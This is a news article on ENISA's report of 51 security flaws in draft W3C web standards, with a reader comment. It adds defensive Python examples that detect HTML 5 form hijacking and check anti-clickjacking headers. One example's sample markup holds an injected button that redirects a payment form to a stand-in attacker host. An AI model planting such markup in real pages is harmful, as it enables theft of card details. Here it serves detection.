Enisa: W3C web standards pose 51 security threats

Summary: Enisa, the EU's information security agency, has found 51 flaws in HTML 5 and other upcoming web standards that could let an attacker steal confidential information

Emerging web standards have over 50 security design flaws, many of which could allow an attacker to steal information, the EU's security agency has warned.

During year-long research, the European Network and Information Security Agency (Enisa) discovered 51 vulnerabilities in 13 upcoming World Wide Web Consortium (W3C) standards and specifications, the agency said in a report on Monday. Among these were issues with the HTML 5 standard, which is being used by Microsoft, Adobe and others in their latest web browsers.

"They're not rootkit-type vulnerabilities, they're more likely to allow an attacker to control a browser context," Giles Hogben, a network security expert at Enisa, told ZDNet UK. "For example, a dodgy page could get information from a legitimate page."

Using the flaws, an attacker could trick people into installing malware to give the hacker remote control of their system, he added. Many could allow a criminal to steal information using form submission and cross-domain requests, according to Enisa.

Possible attacks

In HTML 5, one of the serious design vulnerabilities opens the door to form-tampering through HTML injection. In one scenario, a person buying goods online enters a credit card number and other information into a web form. HTML 5 allows buttons, such as a submit button, to exist outside a web form. With the design flaw, an attacker could trick the buyer into sending the financial information to an unintended destination using a malicious button.
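As an added illustration (not from the Enisa report or this article), a small Python audit that flags the HTML 5 form-association features the scenario above relies on: a submit control that attaches itself, via the `form` attribute, to a form it is not nested in, or that overrides the form's destination with a `formaction` on a different origin. The checkout markup is constructed sample input.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a checkout form followed by a user-controlled area into
# which a button re-targeting the payment form has been injected.
SAMPLE_HTML = """
<form id="pay" action="https://shop.example/charge" method="post">
  <input name="card" type="text">
  <button type="submit">Pay</button>
</form>
<div class="reviews">
  <button form="pay" formaction="https://evil.example/collect">Confirm order</button>
</div>
"""

class FormAuditor(HTMLParser):
    """Collect submit controls that are associated with a form they are not
    nested in, or that point a form's submission at a foreign origin."""
    def __init__(self):
        super().__init__()
        self.forms = {}       # form id -> origin (netloc) of its action
        self.open_forms = []  # ids of forms enclosing the current position
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            fid = a.get("id", "")
            self.forms[fid] = urlparse(a.get("action", "")).netloc
            self.open_forms.append(fid)
        elif tag in ("button", "input"):
            owner = a.get("form")
            if owner is not None and owner not in self.open_forms:
                self.findings.append(f"<{tag} form={owner!r}> sits outside that form")
            target = a.get("formaction")
            if target:
                fid = owner if owner is not None else (self.open_forms[-1] if self.open_forms else None)
                expected = self.forms.get(fid)
                actual = urlparse(target).netloc
                if expected and actual != expected:
                    self.findings.append(f"<{tag} formaction> sends form {fid!r} to {actual}")

    def handle_endtag(self, tag):
        if tag == "form" and self.open_forms:
            self.open_forms.pop()

def audit_forms(html):
    auditor = FormAuditor()
    auditor.feed(html)
    return auditor.findings
```

Run against the sample, the audit reports both the out-of-form association and the foreign `formaction`; a control that stays inside its form and on the form's origin produces no finding.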

Another possible attack outlined by Enisa turns a browser security feature — a sandbox — into a method of subverting HTML 5 security. Putting websites into a sandbox prevents them from accessing the system via the browser. However, the attack described by Enisa uses the sandbox to disable protection against clickjacking. In clickjacking, a user is fooled into clicking on a seemingly innocuous web object such as a button, which then reveals confidential information.

The HTML 5 specification allows a hacker to put a malicious page inside a sandboxed iframe, disabling top-level navigation, and leaving the user open to clickjacking.
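Because a sandboxed iframe can switch off the top-level navigation that script-based frame-busting depends on, the framing restriction has to be enforced by the browser from response headers. The Python below is an added example (not from the report or the article) that classifies a response's headers by the protection they give; the three sample responses are constructed.

```python
def parse_csp(header):
    """Split a Content-Security-Policy value into {directive: [source tokens]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy

def framing_protection(headers):
    """Return how the response restricts being framed:
    'csp' (frame-ancestors), 'xfo' (X-Frame-Options) or None when no
    header restricts framing, i.e. only an in-page script could."""
    h = {k.lower(): v for k, v in headers.items()}
    ancestors = parse_csp(h.get("content-security-policy", "")).get("frame-ancestors")
    if ancestors is not None and "*" not in ancestors:
        return "csp"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "xfo"
    return None

# Constructed sample responses (headers only). The third relies on a
# frame-busting script in its body, which a sandboxed iframe can neutralise.
SAMPLES = {
    "csp-only": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "xfo-only": {"X-Frame-Options": "SAMEORIGIN"},
    "script-only": {"Content-Type": "text/html"},
}

def unprotected(samples=SAMPLES):
    """Names of responses whose framing is not restricted by any header."""
    return [name for name, hdrs in samples.items() if framing_protection(hdrs) is None]
```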

Another flaw highlighted by Enisa, in the Geoloc-Secure-3 cache API specification, lets a hacker retrieve information about the user's location from the cache. In addition, the specification fails to set an upper limit to how long geolocation data is stored in the cache, leaving people open to attacks that give away their movements.

W3C

The W3C has time to change some of the standards, but some may not be reworked to mitigate the flaws completely, according to Hogben. For example, the consortium is unlikely to fully mitigate the HTML 5 form-filling threat through the standard, he said.

"Some of the flaws we don't expect to be [fully] fixed... especially the one about the forms, as the functionality should be in there for a reason," said Hogben. "We don't expect W3C to take the forms functionality out of the spec."

The standards have been developing for varying amounts of time, and Enisa has submitted its report to W3C in time for W3C working groups to consider before specifying the final standards.

"We have worked with Enisa in preparing this review to ensure that it is relevant and timely to the standards work that is going on. What you are seeing here is the security review process functioning as it should: Independent review identifies possible security issues; the relevant Working Groups then analyse and address the issues raised," the W3C said in a statement.

"The relevant W3C working groups will indeed address these vulnerabilities according to the usual W3C process," it added.

Tom Espiner

About Tom Espiner

Tom is a technology reporter for ZDNet.com. He covers the security beat, writing about everything from hacking and cybercrime to threats and mitigation. He also focuses on open source and emerging technologies, all the while trying to cut through greenwash.

Talkback

1 comment
  • While it's good to highlight potential flaws and risks, removing functionality is not always the best approach. As mentioned in the article, oftentimes functionality has good reason for being there.

    Being aware of the risks allows browser developers to put user-controllable safeguards into place to detect and thwart possible dodgy pages while allowing users to whitelist secure pages they trust.

    CSS attacks can be thwarted in a number of ways.

    HTML 4 IFrames, JSON and AJAX are already vulnerable to these kinds of attacks, to some extent; but proper site design mitigates these risks and has allowed the technology to become safely widespread.
    edxxx